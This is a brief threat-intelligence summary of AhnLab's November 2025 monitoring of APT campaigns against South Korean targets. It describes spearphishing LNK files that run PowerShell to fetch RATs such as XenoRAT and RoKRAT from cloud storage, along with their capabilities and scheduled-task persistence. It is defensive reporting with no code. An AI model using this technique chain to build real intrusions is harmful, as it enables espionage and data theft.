AhnLab's November 2025 domestic APT monitoring found spearphishing remained the main delivery path against South Korean targets, with malicious attachments or links used to trigger payload execution. The observed cases included LNK files carrying PowerShell commands that used Dropbox API or Google Drive to download malware, create additional scripts under public user paths, and run obfuscated RAT payloads. Final-stage malware included XenoRAT and RoKRAT, with capabilities such as keylogging, screen capture, command execution, directory listing, file upload, and file download. Other samples downloaded AutoIt components, copied curl.exe under alternate filenames, and registered scheduled tasks for persistence, giving defenders concrete delivery and persistence patterns to hunt in Korean environments.